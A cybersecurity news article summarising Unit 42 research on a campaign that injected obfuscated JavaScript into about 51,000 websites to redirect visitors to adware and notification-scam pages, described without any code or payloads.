Saturday, January 25, 2025
Homecyber securityHackers Inject Weaponized JavaScript (JS) on 51,000 Websites

Hackers Inject Weaponized JavaScript (JS) on 51,000 Websites

Published on

SIEM as a Service

Follow Us on Google News

Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.

Websites continue to be infected by this threat in 2023, as it was active throughout 2022. The malicious JS code was discovered on over 51,000 websites, with several hundred appearing in Tranco’s top 1 million ranked websites.

The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.

The campaign’s complexity lies in its multi-stage injection process, which precedes redirecting harmful web pages as an additional means of evading detection, obfuscation, and benign append attacks were employed.

Impact of the campaign on user

Experts have identified multiple versions of a campaign involving malicious JS code injection into websites by threat actors. During the year 2020, the campaign was observed for the first time.

170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.

A peak of over 4,000 daily URLs was generated as a result of this campaign between May and August 2022. 

The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.

In January 2023, approximately 240,000 website sessions were prevented across 14,773 devices due to blocking measures taken against these websites.

Technical analysis

A malicious payload was hidden in the injected JS code, which was obfuscated to bypass detection and remain undetected. A malicious JS is loaded from a URL obscured by the obfuscated code. 

As part of the code, the malicious JS is dynamically added to the DOM structure, which is also included in the code.

On certain websites, obfuscated JS snippets have been found to be injected into commonly used utility JS files, as per observations. Appending malicious code to extensive sections of benign code, also called a benign append attack, is a common tactic malware authors employ.

It can be used by malware authors to avoid detection by security crawlers and remain undetected. In each JS code snippet, the injected JS code appends external malicious JS code through DOM manipulation.

A malicious payload can be changed in this manner, providing the attacker greater flexibility. In its more recent version, this campaign injects malicious JS code into a website for malicious purposes.

Upon executing the final payload, users are redirected to various websites before reaching a destination webpage, often consisting of adware or a fraudulent page.

This page displays false information that may deceive individuals into granting permission for a malicious website to send browser notifications under the control of an attacker.

The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.

The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors responsible for creating malware have produced multiple variations of the harmful JavaScript code they injected into websites during this campaign.

Detecting different variants of the same attack is a robust characteristic of deep learning techniques often used to detect intrusions.

In order to prevent malicious JS injections, deep learning techniques could be applied to increase the detection rate.

Searching to secure your APIs? – Try Free API Penetration Testing

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Subaru’s STARLINK Connected Car’s Vulnerability Let Attackers Gain Restricted Access

In a groundbreaking discovery on November 20, 2024, cybersecurity researchers Shubham Shah and a...

Android Kiosk Tablets Vulnerability Let Attackers Control AC & Lights

A security flaw found in Android-based kiosk tablets at luxury hotels has exposed a...

CISA Releases Six ICS Advisories Details Security Issues

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued six Industrial Control Systems (ICS)...

Juniper Routers Exploited via Magic Packet Vulnerability to Deploy Custom Backdoor

A sophisticated cyber campaign dubbed "J-magic" has been discovered targeting enterprise-grade Juniper routers with...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

Subaru’s STARLINK Connected Car’s Vulnerability Let Attackers Gain Restricted Access

In a groundbreaking discovery on November 20, 2024, cybersecurity researchers Shubham Shah and a...

Android Kiosk Tablets Vulnerability Let Attackers Control AC & Lights

A security flaw found in Android-based kiosk tablets at luxury hotels has exposed a...

CISA Releases Six ICS Advisories Details Security Issues

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued six Industrial Control Systems (ICS)...